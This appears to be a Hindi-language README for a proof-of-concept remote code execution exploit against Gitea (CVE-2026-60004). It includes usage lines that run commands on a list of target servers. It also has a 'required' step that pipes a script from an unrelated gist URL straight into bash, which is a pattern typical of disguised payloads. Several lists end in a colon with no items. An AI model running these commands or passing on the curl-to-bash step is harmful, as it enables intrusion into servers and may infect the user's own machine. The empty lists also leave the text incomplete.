
CVE-2026-60004
अधिक जानकारी: https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m
PayPal के माध्यम से या नीचे दिए गए QR कोड को स्कैन करके इस प्रोजेक्ट के रखरखाव में सहयोग करें।
इस प्रोजेक्ट का उपयोग केवल सुरक्षित और अधिकृत वातावरण में करें, जैसे:
उदाहरण सेटअप:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
उदाहरण उपयोग:
# 1. Optional global password for lines that omit it
export GITEA_PASSWORD='defaultpass'
# 2. Run (safe first)
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id' --dry-run
# 3. Real run with 3 workers
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id; uname -srm; pwd' -w 3
# 4. Classic single-target still works
python3 gitea_diffpatch_rce_poc.py http://127.0.0.1:3000 admin 'id'
नोट:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y चलाना होगानियंत्रित वातावरण में साइबर सुरक्षा अवधारणाओं को सीखने, परीक्षण करने और शोध करने के लिए एक रिपॉजिटरी।
यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है।
यह उपयोगकर्ताओं को निम्न के बारे में सीखने में मदद करने के लिए डिज़ाइन किया गया है:
इस रिपॉजिटरी का उपयोग केवल उन वातावरणों में करें जहाँ आपके पास अनुमति हो, जैसे:
अनधिकृत या अवैध उपयोग सख्त रूप से निषिद्ध है।
इस प्रोजेक्ट के कारण होने वाली किसी भी क्षति, दुरुपयोग, कानूनी समस्या या हानि के लिए लेखक और योगदानकर्ता जिम्मेदार नहीं हैं।
इस रिपॉजिटरी का उपयोग करके, आप सहमत होते हैं कि:
यह प्रोजेक्ट निम्न के लिए है:
कृपया जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और सभी लागू कानूनों का अनुपालन करें।
जिम्मेदार प्रकटीकरण या सहयोग के लिए, GitHub के माध्यम से रिपॉजिटरी अनुरक्षक से संपर्क करें।